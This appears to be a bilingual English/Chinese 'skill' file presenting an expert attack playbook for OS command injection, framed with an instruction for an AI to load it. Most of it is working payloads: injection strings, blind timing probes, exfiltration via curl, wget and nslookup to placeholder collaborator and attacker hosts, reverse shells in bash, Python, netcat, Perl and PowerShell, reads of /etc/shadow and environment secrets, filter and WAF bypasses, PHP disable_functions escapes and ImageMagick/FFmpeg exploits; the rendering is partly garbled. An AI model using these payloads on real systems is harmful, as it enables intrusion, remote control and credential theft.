Back to Details

cmdi-command-injection

Compare original and translation side by side

🇺🇸

Original

English
🇨🇳

Translation

Chinese

SKILL: OS Command Injection — Expert Attack Playbook

SKILL: OS命令注入 — 专家级攻击操作手册

AI LOAD INSTRUCTION: Expert command injection techniques. Covers all shell metacharacters, blind injection, time-based detection, OOB exfiltration, polyglot payloads, and real-world code patterns. Base models miss subtle injection through unexpected input vectors.
AI加载说明:专家级命令注入技术,涵盖所有shell元字符、盲注、基于时间的检测、带外数据窃取、多语言payload以及真实场景代码模式。基础模型会遗漏通过非预期输入向量产生的隐蔽注入点。

0. RELATED ROUTING

0. 相关跳转指引

Before going deep, you can first load:
  • upload insecure files when the shell sink is part of a broader upload, import, or conversion workflow
深入学习前,你可以先加载:
  • 上传不安全文件 当命令接收点属于更广泛的上传、导入或转换工作流的一部分时适用

First-pass payload families

首轮payload类型

ContextStart WithBackup
generic shell separator
;id
&&id
quoted argument
";id;"
';id;'
blind timing
;sleep 5
& timeout /T 5 /NOBREAK
command substitution
$(id)
`id`
out-of-band DNS
;nslookup token.collab
Windows 
nslookup
variant
text
cat$IFS/etc/passwd
{cat,/etc/passwd}
%0aid
上下文初始payload备用payload
通用shell分隔符
;id
&&id
带引号的参数
";id;"
';id;'
盲注时间检测
;sleep 5
& timeout /T 5 /NOBREAK
命令替换
$(id)
`id`
带外DNS查询
;nslookup token.collab
Windows版
nslookup
变种
text
cat$IFS/etc/passwd
{cat,/etc/passwd}
%0aid

1. SHELL METACHARACTERS (INJECTION OPERATORS)

1. Shell元字符(注入运算符)

These characters break out of the command context and inject new commands:
MetacharacterBehaviorExample
;
Runs second command regardless
dir; whoami
|
Pipes stdout to second command
dir | whoami
||
Run second only if first FAILS
dir || whoami
&
Run second in background (or sequenced in Windows)
dir & whoami
&&
Run second only if first SUCCEEDS
dir && whoami
$(cmd)
Command substitution
echo $(whoami)
`cmd`
Command substitution (backtick)
echo `whoami`
>
Redirect stdout to file
cmd > /tmp/out
>>
Append to file
cmd >> /tmp/out
<
Read file as stdin
cmd < /etc/passwd
%0a
Newline character (URL-encoded)
cmd%0awhoami
%0d%0a
CRLFMulti-command injection
这些字符可以打破原有命令上下文,注入新的命令:
元字符行为说明示例
;
无论前一个命令执行结果如何,都执行第二个命令
dir; whoami
`\`将前一个命令的标准输出作为后一个命令的标准输入
`\\`
&
将第二个命令放在后台执行(Windows下为顺序执行)
dir & whoami
&&
仅当前一个命令执行成功时,执行第二个命令
dir && whoami
$(cmd)
命令替换
echo $(whoami)
`cmd`
反引号形式的命令替换
echo `whoami`
>
将标准输出重定向到文件
cmd > /tmp/out
>>
将标准输出追加到文件末尾
cmd >> /tmp/out
<
读取文件内容作为标准输入
cmd < /etc/passwd
%0a
URL编码的换行符
cmd%0awhoami
%0d%0a
回车换行符多命令注入

2. COMMON VULNERABLE CODE PATTERNS

2. 常见易受攻击代码模式

PHP

PHP

php
$dir = $_GET['dir'];
$out = shell_exec("du -h /var/www/html/" . $dir);
// Inject: dir=../ ; cat /etc/passwd
// Inject: dir=../ $(cat /etc/passwd)

exec("ping -c 1 " . $ip);          // $ip = "127.0.0.1 && cat /etc/passwd"
system("convert " . $file);        // ImageMagick RCE
passthru("nslookup " . $host);     // $host = "x.com; id"
php
$dir = $_GET['dir'];
$out = shell_exec("du -h /var/www/html/" . $dir);
// 注入示例: dir=../ ; cat /etc/passwd
// 注入示例: dir=../ $(cat /etc/passwd)

exec("ping -c 1 " . $ip);          // $ip = "127.0.0.1 && cat /etc/passwd"
system("convert " . $file);        // ImageMagick远程代码执行
passthru("nslookup " . $host);     // $host = "x.com; id"

Python

Python

python
import os
os.system("curl " + url)            # url = "x.com; id"
subprocess.call("ls " + path, shell=True)  # shell=True is the key vulnerability
os.popen("ping " + host)
python
import os
os.system("curl " + url)            # url = "x.com; id"
subprocess.call("ls " + path, shell=True)  # shell=True是核心漏洞点
os.popen("ping " + host)

Node.js

Node.js

javascript
const { exec } = require('child_process');
exec('ping ' + req.query.host, ...);  // host = "x.com; id"
javascript
const { exec } = require('child_process');
exec('ping ' + req.query.host, ...);  // host = "x.com; id"

Perl

Perl

perl
$dir = param("dir");
$command = "du -h /var/www/html" . $dir;
system($command);
// Inject dir field: | cat /etc/passwd
perl
$dir = param("dir");
$command = "du -h /var/www/html" . $dir;
system($command);
// 注入dir字段示例: | cat /etc/passwd

ASP (Classic)

ASP (经典版)

vb
szCMD = "type C:\logs\" & Request.Form("FileName")
Set oShell = Server.CreateObject("WScript.Shell")
oShell.Run szCMD
// Inject FileName: foo.txt & whoami > C:\inetpub\wwwroot\out.txt
vb
szCMD = "type C:\\logs\\" & Request.Form("FileName")
Set oShell = Server.CreateObject("WScript.Shell")
oShell.Run szCMD
// 注入FileName示例: foo.txt & whoami > C:\\inetpub\\wwwroot\\out.txt

3. BLIND COMMAND INJECTION — DETECTION

3. 盲命令注入 — 检测方法

When response shows no command output:
当响应中没有命令输出时使用:

Time-Based Detection

基于时间的检测

bash
undefined
bash
undefined

Linux:

Linux环境:

; sleep 5 | sleep 5 $(sleep 5) 
sleep 5
& sleep 5 &
; sleep 5 | sleep 5 $(sleep 5) 
sleep 5
& sleep 5 &

Windows:

Windows环境:

& timeout /T 5 /NOBREAK & ping -n 5 127.0.0.1 & waitfor /T 5 signal777
Compare response time without payload vs with payload. 5+ second delay = confirmed.
& timeout /T 5 /NOBREAK & ping -n 5 127.0.0.1 & waitfor /T 5 signal777
对比携带payload和不携带payload的响应时间,延迟5秒以上即可确认存在注入。

OOB via DNS

基于DNS的带外检测

bash
undefined
bash
undefined

Linux:

Linux环境:

; nslookup BURP_COLLAB_HOST ; host 
whoami
.BURP_COLLAB_HOST $(nslookup $(whoami).BURP_COLLAB_HOST)
; nslookup BURP_COLLAB_HOST ; host 
whoami
.BURP_COLLAB_HOST $(nslookup $(whoami).BURP_COLLAB_HOST)

Windows:

Windows环境:

& nslookup BURP_COLLAB_HOST & nslookup %USERNAME%.BURP_COLLAB_HOST
undefined
& nslookup BURP_COLLAB_HOST & nslookup %USERNAME%.BURP_COLLAB_HOST
undefined

OOB via HTTP

基于HTTP的带外检测

bash
undefined
bash
undefined

Linux:

Linux环境:

; curl http://BURP_COLLAB_HOST/
whoami
; wget http://BURP_COLLAB_HOST/$(id|base64)
; curl http://BURP_COLLAB_HOST/
whoami
; wget http://BURP_COLLAB_HOST/$(id|base64)

Windows:

Windows环境:

& powershell -c "Invoke-WebRequest http://BURP_COLLAB_HOST/$(whoami)"
undefined
& powershell -c "Invoke-WebRequest http://BURP_COLLAB_HOST/$(whoami)"
undefined

OOB via Out-of-Band File

基于带外文件的检测

bash
; id > /var/www/html/RANDOM_FILE.txt
bash
; id > /var/www/html/RANDOM_FILE.txt

Then access: https://target.com/RANDOM_FILE.txt

之后访问: https://target.com/RANDOM_FILE.txt


---

---

4. INJECTION CONTEXT VARIATIONS

4. 不同注入上下文的变体

Within Quoted String

双引号字符串内部

bash
command "INJECT"
bash
command "INJECT"

Inject: " ; id ; "

注入内容: " ; id ; "

Result: command "" ; id ; ""

执行结果: command "" ; id ; ""

undefined
undefined

Within Single-Quoted String

单引号字符串内部

bash
command 'INJECT'
bash
command 'INJECT'

Inject: '; id;'

注入内容: '; id;'

Result: command ''; id;''

执行结果: command ''; id;''

undefined
undefined

Within Backtick Execution

反引号执行内部

bash
output=`command INJECT`
bash
output=`command INJECT`

Inject: x
; id ;

注入内容: x
; id ;

undefined
undefined

File Path Context

文件路径上下文

bash
cat /var/log/INJECT
bash
cat /var/log/INJECT

Inject: ../../../etc/passwd (path traversal)

注入内容: ../../../etc/passwd (路径遍历)

Inject: access.log; id (command injection)

注入内容: access.log; id (命令注入)


---

---

5. PAYLOAD LIBRARY

5. Payload库

Information Gathering

信息收集类

bash
; id                          # current user
; whoami                      # user name
; uname -a                    # OS info
; cat /etc/passwd             # user list
; cat /etc/shadow             # password hashes (if root)
; ls /home/                   # home directories
; env                         # environment variables (DB creds, API keys!)
; printenv                    # same
; cat /proc/1/environ         # process environment
; ifconfig                    # network interfaces
; cat /etc/hosts              # host entries
bash
; id                          # 当前用户
; whoami                      # 用户名
; uname -a                    # 操作系统信息
; cat /etc/passwd             # 用户列表
; cat /etc/shadow             # 密码哈希(root权限下可读取)
; ls /home/                   # 家目录列表
; env                         # 环境变量(可能包含数据库凭证、API密钥!)
; printenv                    # 同上
; cat /proc/1/environ         # 进程环境变量
; ifconfig                    # 网络接口信息
; cat /etc/hosts              # 主机映射条目

Reverse Shells (Linux)

反弹Shell(Linux)

bash
undefined
bash
undefined

Bash:

Bash:

; bash -i >& /dev/tcp/ATTACKER/4444 0>&1 ; bash -c 'bash -i >& /dev/tcp/ATTACKER/4444 0>&1'
; bash -i >& /dev/tcp/ATTACKER/4444 0>&1 ; bash -c 'bash -i >& /dev/tcp/ATTACKER/4444 0>&1'

Python:

Python:

; python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("ATTACKER",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
; python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("ATTACKER",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'

Netcat (with -e):

Netcat (带-e参数):

; nc ATTACKER 4444 -e /bin/bash
; nc ATTACKER 4444 -e /bin/bash

Netcat (without -e / OpenBSD):

Netcat (不带-e参数 / OpenBSD版本):

; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ATTACKER 4444 >/tmp/f
; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ATTACKER 4444 >/tmp/f

Perl:

Perl:

; perl -e 'use Socket;$i="ATTACKER";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
undefined
; perl -e 'use Socket;$i="ATTACKER";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
undefined

Reverse Shells (Windows via PowerShell)

反弹Shell(Windows通过PowerShell)

powershell
& powershell -NoP -NonI -W Hidden -Exec Bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER/shell.ps1')"

& powershell -c "$client = New-Object System.Net.Sockets.TCPClient('ATTACKER',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
powershell
& powershell -NoP -NonI -W Hidden -Exec Bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER/shell.ps1')"

& powershell -c "$client = New-Object System.Net.Sockets.TCPClient('ATTACKER',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

6. FILTER BYPASS TECHNIQUES

6. 过滤绕过技术

Space Alternatives (when space is filtered)

空格替代方案(空格被过滤时使用)

bash
cat</etc/passwd          # < instead of space
{cat,/etc/passwd}        # brace expansion
cat$IFS/etc/passwd       # $IFS variable (field separator)
X=$'\x20'&&cat${X}/etc/passwd  # hex encoded space
bash
cat</etc/passwd          # 用<替代空格
{cat,/etc/passwd}        # 大括号扩展
cat$IFS/etc/passwd       # $IFS变量(字段分隔符)
X=$'\\x20'&&cat${X}/etc/passwd  # 十六进制编码的空格

Slash Alternatives (when 
/
is filtered)

斜杠替代方案(/被过滤时使用

bash
$'\057'etc$'\057'passwd  # octal representation
cat /???/???sec???        # glob expansion
bash
$'\\057'etc$'\\057'passwd  # 八进制表示
cat /???/???sec???        # 通配符扩展

Keyword Bypass via Variable Assembly

通过变量拼接绕过关键词过滤

bash
a=c;b=at;c=/etc/passwd; $a$b $c   # 'cat /etc/passwd'
c=at;ca$c /etc/passwd              # cat
bash
a=c;b=at;c=/etc/passwd; $a$b $c   # 拼接为'cat /etc/passwd'
c=at;ca$c /etc/passwd              # 拼接为cat

Newline Injection

换行注入

cmd%0Aid%0Awhoami          # URL-encoded newlines
cmd$'\n'id$'\n'whoami      # literal newlines
cmd%0Aid%0Awhoami          # URL编码的换行符
cmd$'\
'id$'\
'whoami      # 字面量换行符

7. COMMON INJECTION ENTRY POINTS

7. 常见注入入口点

EntryExample
Network toolsping, nslookup, traceroute, whois forms
File conversionimage resize, PDF generate, format convert
Email sendersFrom address, name fields in notification emails
Search/sort parametersPassed to grep, find, sort commands
Log viewingPassed to tail, grep commands
Custom script execution"Run test" features, CI/CD hooks
DNS lookup featuresrDNS lookup, WHOIS query
Backup/restore featuresFile path parameters
Archive processingzip/unzip, tar with user-provided filename
入口点示例
网络工具ping、nslookup、traceroute、whois查询表单
文件转换图片缩放、PDF生成、格式转换功能
邮件发送功能通知邮件的发件人地址、姓名字段
搜索/排序参数传入grep、find、sort命令的参数
日志查看功能传入tail、grep命令的参数
自定义脚本执行"运行测试"功能、CI/CD钩子
DNS查询功能反向DNS查询、WHOIS查询
备份/恢复功能文件路径参数
压缩包处理携带用户提供文件名的zip/unzip、tar操作

8. BLIND INJECTION DECISION TREE

8. 盲注决策树

Found potential injection point?
├── Try basic: ; sleep 5
│   └── Response delays? → Confirmed blind injection
│       ├── Extract data via timing: if/then sleep
│       └── Use OOB: curl/nslookup to Collaborator
├── No delay observed?
│   ├── Try: | sleep 5
│   ├── Try: $(sleep 5)
│   ├── Try: ` sleep 5 `
│   ├── Try after URL encoding: %3B%20sleep%205
│   └── Try double encoding: %253B%2520sleep%25205
└── All blocked → check WEB APPLICATION LAYER
    Filter on input? → encode differently
    Filter on specific commands? → whitespace bypass, $IFS, glob
发现潜在注入点?
├── 尝试基础payload: ; sleep 5
│   └── 响应延迟? → 确认存在盲注
│       ├── 通过时间延迟提取数据: if/then sleep
│       └── 使用带外技术: curl/nslookup到Collaborator服务器
├── 未观察到延迟?
│   ├── 尝试: | sleep 5
│   ├── 尝试: $(sleep 5)
│   ├── 尝试: ` sleep 5 `
│   ├── URL编码后尝试: %3B%20sleep%205
│   └── 二次编码后尝试: %253B%2520sleep%25205
└── 全部被拦截 → 检查Web应用层
    输入层过滤? → 换编码方式
    特定命令过滤? → 空格绕过、$IFS、通配符

9. ADVANCED WAF BYPASS TECHNIQUES

9. 高级WAF绕过技术

Wildcard Expansion

通配符扩展

bash
undefined
bash
undefined

Use ? and * to bypass keyword filters:

使用?和*绕过关键词过滤:

/???/??t /???/p??s?? # /bin/cat /etc/passwd /???/???/????2 *.php # /usr/bin/find2 *.php (approximate)
/???/??t /???/p??s?? # 等价于/bin/cat /etc/passwd /???/???/????2 *.php # 等价于/usr/bin/find2 *.php(近似)

Globbing for specific files:

通配符匹配特定文件:

cat /e?c/p?sswd cat /ec/pd
undefined
cat /e?c/p?sswd cat /ec/pd
undefined

cat Alternatives (when "cat" is filtered)

cat替代命令(cat被过滤时使用)

bash
tac /etc/passwd          # reverse cat
nl /etc/passwd           # numbered lines
head /etc/passwd
tail /etc/passwd
more /etc/passwd
less /etc/passwd
sort /etc/passwd
uniq /etc/passwd
rev /etc/passwd | rev
xxd /etc/passwd
strings /etc/passwd
od -c /etc/passwd
base64 /etc/passwd       # then decode offline
bash
tac /etc/passwd          # 反向输出
nl /etc/passwd           # 带行号输出
head /etc/passwd
tail /etc/passwd
more /etc/passwd
less /etc/passwd
sort /etc/passwd
uniq /etc/passwd
rev /etc/passwd | rev
xxd /etc/passwd
strings /etc/passwd
od -c /etc/passwd
base64 /etc/passwd       # 之后离线解码

Comment Insertion (PHP specific)

插入注释(PHP专属)

bash
undefined
bash
undefined

Insert comments within function names to bypass WAF:

在函数名中插入注释绕过WAF:

sys/x/tem('id') # PHP ignores /* */ in some eval contexts
sys/x/tem('id') # PHP在部分eval上下文中会忽略/* */注释

Note: this works with eval() and similar PHP dynamic calls

注意: 该方法适用于eval()及类似PHP动态调用场景

undefined
undefined

XOR String Construction (PHP)

XOR字符串构造(PHP)

php
undefined
php
undefined

Build function names from XOR of printable characters:

通过可打印字符的异或构造函数名:

$_=('%01'^'
').('%13'^'
').('%13'^'
').('%05'^'
').('%12'^'
').('%14'^'
');
$_=('%01'^'
').('%13'^'
').('%13'^'
').('%05'^'
').('%12'^'
').('%14'^'
');

Produces: "assert"

生成结果: "assert"

$_('%13%19%13%14%05%0d'|'%60%60%60%60%60%60');
$_('%13%19%13%14%05%0d'|'%60%60%60%60%60%60');

Evaluates: assert("system")

执行结果: assert("system")

undefined
undefined

Base64/ROT13 Encoding

Base64/ROT13编码

php
undefined
php
undefined

Encode payload, decode at runtime:

编码payload,运行时解码:

base64_decode('c3lzdGVt')('id'); # system('id') str_rot13('flfgrz')('id'); # system → flfgrz via ROT13
undefined
base64_decode('c3lzdGVt')('id'); # 等价于system('id') str_rot13('flfgrz')('id'); # system通过ROT13编码为flfgrz
undefined

chr() Assembly

chr()拼接

php
undefined
php
undefined

Build strings character by character:

逐字符拼接字符串:

chr(115).chr(121).chr(115).chr(116).chr(101).chr(109) # "system"
undefined
chr(115).chr(121).chr(115).chr(116).chr(101).chr(109) # 生成"system"
undefined

Dollar-Sign Variable Tricks

美元符号变量技巧

bash
undefined
bash
undefined

$IFS (Internal Field Separator) as space:

$IFS(内部字段分隔符)作为空格:

cat$IFS/etc/passwd cat${IFS}/etc/passwd
cat$IFS/etc/passwd cat${IFS}/etc/passwd

Unset variables expand to empty:

未定义变量扩展为空:

c${x}at /etc/passwd # $x is unset → "cat"

---
c${x}at /etc/passwd # $x未定义 → 拼接为"cat"

---

10. PHP disable_functions BYPASS PATHS

10. PHP disable_functions绕过路径

When 
system()
, 
exec()
, 
shell_exec()
, 
passthru()
, 
popen()
, 
proc_open()
are all disabled:
system()
exec()
shell_exec()
passthru()
popen()
proc_open()
全部被禁用时:

Path 1: LD_PRELOAD + mail()/putenv()

路径1: LD_PRELOAD + mail()/putenv()

php
// 1. Upload shared object (.so) that hooks a libc function
// 2. Set LD_PRELOAD to point to it
putenv("LD_PRELOAD=/tmp/evil.so");
// 3. Trigger external process (mail() calls sendmail)
mail("a@b.com", "", "");
// The .so's constructor runs with shell access
php
// 1. 上传hook了libc函数的共享对象(.so)文件
// 2. 设置LD_PRELOAD指向该文件
putenv("LD_PRELOAD=/tmp/evil.so");
// 3. 触发外部进程(mail()会调用sendmail)
mail("a@b.com", "", "");
// .so文件的构造函数会获得shell权限执行

Path 2: Shellshock (CVE-2014-6271)

路径2: Shellshock (CVE-2014-6271)

php
// If bash is vulnerable to Shellshock:
putenv("PHP_LOL=() { :; }; /usr/bin/id > /tmp/out");
mail("a@b.com", "", "");
// Bash processes the function definition and runs the trailing command
php
// 如果bash存在Shellshock漏洞:
putenv("PHP_LOL=() { :; }; /usr/bin/id > /tmp/out");
mail("a@b.com", "", "");
// Bash会处理函数定义并执行后面的命令

Path 3: Apache mod_cgi + .htaccess

路径3: Apache mod_cgi + .htaccess

php
// Write .htaccess enabling CGI:
file_put_contents('/var/www/html/.htaccess', 'Options +ExecCGI\nAddHandler cgi-script .sh');
// Write CGI script:
file_put_contents('/var/www/html/cmd.sh', "#!/bin/bash\necho Content-type: text/html\necho\n$1");
chmod('/var/www/html/cmd.sh', 0755);
// Access: /cmd.sh?id
php
// 写入.htaccess启用CGI:
file_put_contents('/var/www/html/.htaccess', 'Options +ExecCGI\
AddHandler cgi-script .sh');
// 写入CGI脚本:
file_put_contents('/var/www/html/cmd.sh', "#!/bin/bash\
echo Content-type: text/html\
echo\
$1");
chmod('/var/www/html/cmd.sh', 0755);
// 访问: /cmd.sh?id

Path 4: PHP-FPM / FastCGI

路径4: PHP-FPM / FastCGI

php
// If PHP-FPM socket is accessible (/var/run/php-fpm.sock or port 9000):
// Send crafted FastCGI request to execute arbitrary PHP with different php.ini
// Tool: https://github.com/neex/phuip-fpizdam
// Override: PHP_VALUE=auto_prepend_file=/tmp/shell.php
php
// 如果PHP-FPM socket可访问(/var/run/php-fpm.sock或9000端口):
// 发送构造的FastCGI请求,使用不同的php.ini执行任意PHP代码
// 工具: https://github.com/neex/phuip-fpizdam
// 覆盖配置: PHP_VALUE=auto_prepend_file=/tmp/shell.php

Path 5: COM Object (Windows)

路径5: COM对象(Windows专属)

php
// Windows only, if COM extension enabled:
$wsh = new COM('WScript.Shell');
$exec = $wsh->Run('cmd /c whoami > C:\inetpub\wwwroot\out.txt', 0, true);
php
// 仅Windows环境,COM扩展启用时可用:
$wsh = new COM('WScript.Shell');
$exec = $wsh->Run('cmd /c whoami > C:\\inetpub\\wwwroot\\out.txt', 0, true);

Path 6: ImageMagick Delegate (CVE-2016-3714 "ImageTragick")

路径6: ImageMagick Delegate (CVE-2016-3714 "ImageTragick")

php
// If ImageMagick processes user-uploaded images:
// Upload SVG/MVG with embedded command:
// Content of exploit.svg:
push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg"|id > /tmp/pwned")'
pop graphic-context
Also consider (summary): iconv (CVE-2024-2961) via 
php://filter/convert.iconv
; FFI (
FFI::cdef
+ 
libc
) when the extension is enabled.
php
// 如果ImageMagick处理用户上传的图片:
// 上传嵌入命令的SVG/MVG文件:
// exploit.svg内容:
push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg"|id > /tmp/pwned")'
pop graphic-context
其他可考虑的方法(摘要): 通过
php://filter/convert.iconv
利用iconv漏洞(CVE-2024-2961);FFI扩展启用时使用
FFI::cdef
+ 
libc
执行命令。

11. COMPONENT-LEVEL COMMAND INJECTION

11. 组件级命令注入

ImageMagick Delegate Abuse

ImageMagick Delegate滥用

undefined
undefined

MVG format with shell command in URL:

MVG格式URL中嵌入shell命令:

push graphic-context viewbox 0 0 640 480 image over 0,0 0,0 'https://127.0.0.1/x.php?x=`id > /tmp/out`' pop graphic-context
push graphic-context viewbox 0 0 640 480 image over 0,0 0,0 'https://127.0.0.1/x.php?x=`id > /tmp/out`' pop graphic-context

Or via filename: convert '|id' out.png

或通过文件名: convert '|id' out.png

undefined
undefined

FFmpeg (HLS/concat protocol)

FFmpeg (HLS/concat协议)

undefined
undefined

SSRF/LFI via m3u8 playlist:

通过m3u8播放列表实现SSRF/本地文件读取:

#EXTM3U #EXT-X-MEDIA-SEQUENCE:0 #EXTINF:10.0, concat:http://attacker.com/header.txt|file:///etc/passwd #EXT-X-ENDLIST
#EXTM3U #EXT-X-MEDIA-SEQUENCE:0 #EXTINF:10.0, concat:http://attacker.com/header.txt|file:///etc/passwd #EXT-X-ENDLIST

Upload as .m3u8, FFmpeg processes and may leak file contents in output

上传为.m3u8文件,FFmpeg处理后可能在输出中泄露文件内容

undefined
undefined

Elasticsearch Groovy Script (pre-5.x)

Elasticsearch Groovy脚本(5.x之前版本)

json
POST /_search
{
  "query": { "match_all": {} },
  "script_fields": {
    "cmd": {
      "script": "Runtime rt = Runtime.getRuntime(); rt.exec('id')"
    }
  }
}
json
POST /_search
{
  "query": { "match_all": {} },
  "script_fields": {
    "cmd": {
      "script": "Runtime rt = Runtime.getRuntime(); rt.exec('id')"
    }
  }
}

Ping/Traceroute/NSLookup Diagnostic Pages

Ping/Traceroute/NSLookup诊断页面

undefined
undefined

Classic injection point in network diagnostic features:

网络诊断功能中的经典注入点:

Input: 127.0.0.1; id

输入: 127.0.0.1; id

Input: 127.0.0.1 && cat /etc/passwd

输入: 127.0.0.1 && cat /etc/passwd

Input: 
id
.attacker.com (DNS exfil via backtick)

输入: 
id
.attacker.com (通过反引号实现DNS数据渗出

These features directly call OS commands with user input

这些功能直接将用户输入传入OS命令执行


**Other sinks (quick reference):** PDF generators (wkhtmltopdf / WeasyPrint with user HTML); Git wrappers (`git clone` URL / hooks).

**其他接收点(快速参考):** PDF生成器(wkhtmltopdf / WeasyPrint处理用户提供的HTML);Git封装工具(`git clone` URL / 钩子)。
",